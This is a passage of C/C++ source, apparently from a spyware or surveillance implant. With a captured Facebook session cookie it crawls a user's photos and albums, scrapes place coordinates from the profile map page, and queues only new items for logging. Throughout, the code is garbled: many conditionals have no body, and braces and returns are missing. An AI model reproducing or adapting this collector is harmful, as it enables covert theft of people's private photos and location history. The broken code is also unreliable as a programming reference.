    chTmp = *strParser2;
    *strParser2 = NULL;

    LPWSTR strUrlSinglePhoto = (LPWSTR) zalloc_s(URL_SIZE_IN_CHARS * sizeof(WCHAR));
    if (!strUrlSinglePhoto)

    _snwprintf_s(strUrlSinglePhoto, URL_SIZE_IN_CHARS, _TRUNCATE, L"/profile.php?id=%S&sk=photos&collection_token=%S", strUserId, strParser1);

    /* restore strPageContainingToken */
    *strParser2 = chTmp;

    /* c] loop through each album and fetch all the fbids */

    /*    album urls example: <a class="albumThumbLink uiMediaThumb uiScrollableThumb" href="https://www.facebook.com/media/set/?set=a.1588543974708123.1073741826.100006576075695&amp;type=3" 
        we need only set=*, the remaining is obtained from SinglePhotoAlbumAppCollectionPagelet     */
    // TODO: limit the number of albums fetched ?

    strParser1 = strRecvAlbumsBuffer;
    while (TRUE)
        strParser1 = strstr(strParser1, "albumThumbLink");
        if (!strParser1)

        strParser1 = strstr(strParser1, "set/?");
        if (!strParser1)

        strParser1 += strlen("set/?");

        /* we need to replace &amp;type=3, with &type=3, atm without calling external functions*/

        strParser2 = strstr(strParser1, "&amp;type=");
        if (!strParser2)
        /* albums url contain "type=3" */
        if (strstr(strParser1, "type=3"))

            /* after we've searched type=3 we can null terminate the string */
            *strParser2 = NULL;

            /* b] for each album fetch contained fbids */
            _snwprintf_s(strUrlAlbums, URL_SIZE_IN_CHARS, _TRUNCATE, L"%s&%S&type=3", strUrlSinglePhoto, strParser1);

#ifdef _DEBUG
            OutputDebug(L"[*] %S - album url: %s\n", __FUNCTION__, strUrlAlbums);

            dwBuffSize = 0;
            LPSTR strRecvThisAlbumBuffer = NULL;
            dwRet = HttpSocialRequest(L"www.facebook.com", L"GET", strUrlAlbums, 443, NULL, 0, (LPBYTE *) &strRecvThisAlbumBuffer, &dwBuffSize, strCookie);
            SecureZeroMemory(strUrlAlbums, URL_SIZE_IN_CHARS * sizeof(WCHAR));
            /* if there are issues, bail altogether, we'll retry on next run of the PhotoHandler */
            if (dwRet != SOCIAL_REQUEST_SUCCESS)

            FacebookPhotoExtractFbidsFromPage(strRecvThisAlbumBuffer, hash_head, PHOTOS_ALBUM);

        /* prepare for next round */
        strParser1 = strParser2 + 1;
    /* cleanup */

    Description:    given a json object containing Facebook places, extracts and packs data into additionalheader and body
    Parameters:        json object, pointer to additionalheader, body that will contain the payload, pointer to size of body, Facebook user id
    Usage:            return true there're data to log, false otherwise. Body is allocated and must be freed by the caller
BOOL FacebookPlacesExtractPositions(__in JSONValue *jValue,  __in LPSTR strUserId, facebook_placeId_to_location **hash_head )
    /* pretty much a ripoff of FacebookPlacesExtractPosition(__in JSONValue *jValue, __out location_additionalheader_struct *additionalheader, __out BYTE **body, __out DWORD *blen, __in LPSTR strUserId ):position.cpp */
    /* get last place timestamp */
    DWORD dwHighestBatchTimestamp = 0;
    CHAR strUsernameForPlaces[512];
    _snprintf_s(strUsernameForPlaces, sizeof(strUsernameForPlaces), _TRUNCATE, "%s-facebookphotopositions", strUserId);
    DWORD dwLastTimestampLow, dwLastTimestampHigh;
    dwLastTimestampLow = SocialGetLastTimestamp(strUsernameForPlaces, &dwLastTimestampHigh);
    if (dwLastTimestampLow == SOCIAL_INVALID_MESSAGE_ID)
        return FALSE;

    /* get the number of locations */
    JSONObject jRoot = jValue->AsObject();
    if (jRoot.find(L"jsmods") != jRoot.end() && jRoot[L"jsmods"]->IsObject())
        JSONObject jJsmods = jRoot[L"jsmods"]->AsObject();

        if (jJsmods.find(L"require") != jJsmods.end() && jJsmods[L"require"]->IsArray())
            JSONArray jRequire = jJsmods[L"require"]->AsArray();

            if ( jRequire.size() > 0 && jRequire.at(0)->IsArray())
                JSONArray jTmp = jRequire.at(0)->AsArray();
                if (jTmp.size() > 3 && jTmp.at(3)->IsArray())
                    JSONArray jTmp2 = jTmp.at(3)->AsArray();

                    if (jTmp2.size() > 1 && jTmp2.at(1)->IsObject())
                        JSONObject jObj = jTmp2.at(1)->AsObject();

                        /* jObj contains:
                        "stories":[ array with timestamps ],
                        "places":[ array with places ],
                        "count":4, // number of different places

                        if ((jObj[L"places"]->IsArray() && jObj[L"places"]->IsArray()) && (jObj[L"stories"]->IsArray() && jObj[L"stories"]->IsArray()))
                            JSONArray jPlaces = jObj[L"places"]->AsArray();
                            JSONArray jStories = jObj[L"stories"]->AsArray();

                            /*  stories element example: {"timestamp":1418910342, .. ,"placeID":133355006713850, ..  }
                                places element example:  {"id":133355006713850, "name":"Isle of Skye, Scotland, UK","latitude":57.41219383264, "longitude":-6.1920373066084,"city":814578, "country":"GB"   } 

                            /* loop through stories, for each story find the corresponding place and set the gps record (suboptimal..) */
                            for (DWORD i=0; i<jStories.size(); i++)
                                if (!jStories.at(i)->IsObject())

                                UINT64 current_id;
                                time_t time = 0;

                                /* extract story id and timestamp */
                                JSONObject jStory = jStories.at(i)->AsObject();
                                if (jStory.find(L"placeID") != jStory.end() && jStory[L"placeID"]->IsNumber())
                                    current_id = (UINT64) jStory[L"placeID"]->AsNumber();
                                if (jStory.find(L"timestamp") != jStory.end() && jStory[L"timestamp"]->IsNumber())
                                     time = (time_t) jStory[L"timestamp"]->AsNumber();

                                /* save the most recent timestamp for this batch */
                                if (time > dwHighestBatchTimestamp)
                                    dwHighestBatchTimestamp = time;
                                /* if it's recent save it otherwise skip this record */
                                if (time <= dwLastTimestampLow)

                                /* find place id in places: suboptimal version loop through each time */
                                for (DWORD j=0; j<jPlaces.size(); j++)
                                    if (!jPlaces.at(j)->IsObject())

                                    UINT64 tmp_id;

                                    JSONObject jPlace = jPlaces.at(j)->AsObject();
                                    if (jPlace.find(L"id") != jPlace.end() && jPlace[L"id"]->IsNumber())
                                        tmp_id = (UINT64) jPlace[L"id"]->AsNumber();

                                        if (tmp_id == current_id)
                                            /* got our guy, fill a gps position record */

                                            if (jPlace.find(L"latitude") != jPlace.end() && jPlace[L"latitude"]->IsNumber() &&
                                                jPlace.find(L"longitude") != jPlace.end() && jPlace[L"longitude"]->IsNumber())
#ifdef _DEBUG
                                                OutputDebug(L"[*] Got %I64u lat long\n", tmp_id, jPlace[L"latitude"]->AsNumber(), jPlace[L"longitude"]->AsNumber());
                                                facebook_placeId_to_location *placeId_new = (facebook_placeId_to_location*) zalloc_s(sizeof(facebook_placeId_to_location));
                                                placeId_new->placeId = tmp_id;
                                                placeId_new->latitude =  (FLOAT) jPlace[L"latitude"]->AsNumber();
                                                placeId_new->longitude = (FLOAT) jPlace[L"longitude"]->AsNumber();

                                                facebook_placeId_to_location *placeId_tmp = NULL;
                                                HASH_FIND(hh, *hash_head, &placeId_new->placeId, sizeof(UINT64), placeId_tmp);
                                                if (placeId_tmp == NULL) 
                                                    HASH_ADD(hh, *hash_head, placeId, sizeof(UINT64), placeId_new);

                                        } //if (tmp_id == current_id)
                                    } //if (jPlace.find(L"id") != jPlace.end() && jPlace[L"id"]->IsNumber())
                                } //for (DWORD j=0; j<jPlaces.size(); j++)
                            } //for (DWORD i=0; i<jStories.size(); i++)

                            /* save the highest timestamp in the batch */
                            if (dwHighestBatchTimestamp > dwLastTimestampLow)
                                SocialSetLastTimestamp(strUsernameForPlaces, dwHighestBatchTimestamp, 0);

                        } //if ((jObj[L"places"]->IsArray() && jObj[L"places"]->IsArray())
                    } //if (jTmp2.size() > 1 && jTmp2.at(1)->IsObject())

    /*     true if *body is not null, otherwise false */
    return TRUE;

VOID FacebookPhotoFetchPlaceIdToCoordinate(__in LPSTR strCookie, __in LPSTR strUserId, facebook_placeId_to_location **idToLocation)
    /* pretty much a ripoff of FacebookPositionHandler(LPSTR strCookie):position.cpp */
    LPSTR strParser1, strParser2;

    LPWSTR strUrl = (LPWSTR) zalloc(2048*sizeof(WCHAR));
    _snwprintf_s(strUrl, 2048, _TRUNCATE, L"/profile.php?id=%S&sk=map", strUserId);
    LPSTR strRecvBuffer = NULL;
    DWORD dwBuffSize;
    DWORD dwRet = HttpSocialRequest(L"www.facebook.com", L"GET", strUrl, 443, NULL, 0, (LPBYTE *)&strRecvBuffer, &dwBuffSize, strCookie); 



    /* find the snippet of json we're interested in and give it to the parser */
    strParser1 = strstr(strRecvBuffer, "{\"display_dependency\":[\"pagelet_timeline_medley_inner_map\"]");
    if (!strParser1)
        /* cleanup */

    strParser2 = strstr(strParser1, "})");
    *(strParser2+1) = NULL;

#ifdef _DEBUG
        OutputDebug(L"[*] %S - position json: %S\n", __FUNCTION__, strParser1);

    LPSTR strJson = strParser1;

    JSONValue *jValue = JSON::Parse(strJson);
    if (jValue != NULL && jValue->IsObject())
        FacebookPlacesExtractPositions(jValue, strUserId, idToLocation);

    /* cleanup */

    if (jValue)
        delete jValue;


    Description:    Facebook photo handling entry point, extracts Facebook photos and its metadata
    Params:            cookie needed to log into Facebook
    Usage:            -

DWORD FacebookPhotoHandler(__in LPSTR strCookie)
    /*    allocations:
            - items of hash_head are allocated by the crawling functions and freed in the handle loop
            - strSocialUsername_* allocated and free'd before the handle loop

    /* hash declaration */
    facebook_photo_id *hash_head = NULL;
    LPSTR strUserId, strScreenName;

    if (!ConfIsModuleEnabled(L"photo"))

    if (!FacebookGetUserInfo(strCookie, &strUserId, &strScreenName))

    /*  0] fetch Photo page, e.g.:

        - get collection_tokens, the tidbit in the URL that differentiate between Photos of You, Your Photo and Albums 
        - from each page collect the fbid, which identifies a photo univocally

    LPWSTR strUrl = (LPWSTR) zalloc_s(URL_SIZE_IN_CHARS *sizeof(WCHAR));
    if (!strUrl)

    _snwprintf_s(strUrl, URL_SIZE_IN_CHARS , _TRUNCATE, L"/profile.php?id=%S&sk=photos", strUserId);

    LPSTR strRecvBuffer = NULL;
    DWORD dwBuffSize;
    DWORD dwRet = HttpSocialRequest(L"www.facebook.com", L"GET", strUrl, 443, NULL, 0, (LPBYTE *)&strRecvBuffer, &dwBuffSize, strCookie);


    /* 1] Your Photos */
    // N.B.:
    // - must stay on top, since it will avoid any clash with fbids
    FacebookPhotoCrawlYourPhotos(strCookie, strUserId, strRecvBuffer, &hash_head);

    /* 2] Photos of You */
    FacebookPhotoCrawlPhotosOfYou(strCookie, strUserId, strRecvBuffer, &hash_head);

    /* 3] Albums */
    // photos from album managed by two users are found only in Albums, 
    // N.B.:
    // - it must follow "Your Photos"
    // - some photos posted by other users sharing an album might be missing
    FacebookPhotoCrawlAlbums(strCookie, strUserId, strRecvBuffer, &hash_head);

    /* 4] if there are some photos fetch pre-emptively the map pages containing 
          the mapping place_id -> coordinates */
    facebook_placeId_to_location *idToLocation_hash_head = NULL;

    if (HASH_COUNT(hash_head) > 0 )
        FacebookPhotoFetchPlaceIdToCoordinate(strCookie, strUserId, &idToLocation_hash_head);
    /* 5] Once we've collected all the fbids, 'handle' the photos */
    facebook_photo_id *fbid_tmp, *fbid_current;

    // 0 -> PHOTOS_YOURS
    // 1 -> PHOTOS_OF_YOU
    // 2 -> PHOTOS_ALBUM
    DWORD dwMaxItemsPerRun_0 = 30, dwMaxItemsPerRun_1 = 30, dwMaxItemsPerRun_2 = 30;
    DWORD dwCurrentItemsPerRun_0 = 0, dwCurrentItemsPerRun_1 = 0, dwCurrentItemsPerRun_2 = 0;
    UINT64 highestBatchFbid_0 = 0, highestBatchFbid_1 = 0, highestBatchFbid_2 = 0;

    size_t strUsernameSize = strlen(strUserId) + strlen("_photos_1") + 1;
    LPSTR strSocialUsername_0 = (LPSTR) zalloc_s(strUsernameSize);
    LPSTR strSocialUsername_1 = (LPSTR) zalloc_s(strUsernameSize);
    LPSTR strSocialUsername_2 = (LPSTR) zalloc_s(strUsernameSize);

    if (strSocialUsername_0 && strSocialUsername_1 && strSocialUsername_2)
        _snprintf_s(strSocialUsername_0, strUsernameSize, _TRUNCATE, "%s_photos_0", strUserId);
        _snprintf_s(strSocialUsername_1, strUsernameSize, _TRUNCATE, "%s_photos_1", strUserId);
        _snprintf_s(strSocialUsername_2, strUsernameSize, _TRUNCATE, "%s_photos_2", strUserId);

        // get saved highest timestamp  for the three sets
        UINT64 savedHighestBatchFbid_0 = SocialGetLastMessageId(strSocialUsername_0);
        UINT64 savedHighestBatchFbid_1 = SocialGetLastMessageId(strSocialUsername_1);
        UINT64 savedHighestBatchFbid_2 = SocialGetLastMessageId(strSocialUsername_2);

        // loop through the 2 sets and select the candidates for each set, i.e. filter
        HASH_ITER(hh, hash_head, fbid_current, fbid_tmp) {

#ifdef _DEBUG        
            OutputDebug(L"[*] %S - found: %I64d\n", __FUNCTION__, fbid_current->fbid);
            // set PHOTOS_YOURS
            if (fbid_current->dwType == PHOTOS_YOURS)
                if (fbid_current->fbid > savedHighestBatchFbid_0 && 
                    dwCurrentItemsPerRun_0 < dwMaxItemsPerRun_0 )
                    // handle the photo
                    FacebookPhotoHandleSinglePhoto(strCookie, fbid_current, idToLocation_hash_head);
                    dwCurrentItemsPerRun_0 +=1;

                    // update highest batch fbid in case
                    if (fbid_current->fbid > highestBatchFbid_0)
                        highestBatchFbid_0 = fbid_current->fbid;

            // set PHOTOS_OF_YOU
            else if (fbid_current->dwType == PHOTOS_OF_YOU)
                if (fbid_current->fbid > savedHighestBatchFbid_1 && 
                    dwCurrentItemsPerRun_1 < dwMaxItemsPerRun_1 )
                    // handle the photo
                    FacebookPhotoHandleSinglePhoto(strCookie, fbid_current,  idToLocation_hash_head);
                    dwCurrentItemsPerRun_1 +=1;

                    // update highest batch fbid in case
                    if (fbid_current->fbid > highestBatchFbid_1)
                        highestBatchFbid_1 = fbid_current->fbid;
            // set PHOTOS_ALBUM
            else if (fbid_current->dwType == PHOTOS_ALBUM)
                if (fbid_current->fbid > savedHighestBatchFbid_2 && 
                    dwCurrentItemsPerRun_2 < dwMaxItemsPerRun_2 )
                    // handle the photo
                    FacebookPhotoHandleSinglePhoto(strCookie, fbid_current,  idToLocation_hash_head);
                    dwCurrentItemsPerRun_2 +=1;

                    // update highest batch fbid in case
                    if (fbid_current->fbid > highestBatchFbid_2)
                        highestBatchFbid_2 = fbid_current->fbid;
            // remove the photo from the hash
            HASH_DEL(hash_head, fbid_current);

        // update highest fbid if needed
        if (highestBatchFbid_0 > savedHighestBatchFbid_0)
            SocialSetLastMessageId(strSocialUsername_0, highestBatchFbid_0 );

        if (highestBatchFbid_1 > savedHighestBatchFbid_1)
            SocialSetLastMessageId(strSocialUsername_1, highestBatchFbid_1 );
        if (highestBatchFbid_2 > savedHighestBatchFbid_2)
            SocialSetLastMessageId(strSocialUsername_2, highestBatchFbid_2 );

        // free facebook_placeId_to_location *idToLocation
        facebook_placeId_to_location *placeId_tmp, *placeId_current;
        HASH_ITER(hh, idToLocation_hash_head, placeId_current, placeId_tmp)
            HASH_DEL(idToLocation_hash_head, placeId_current);


    /* cleanup */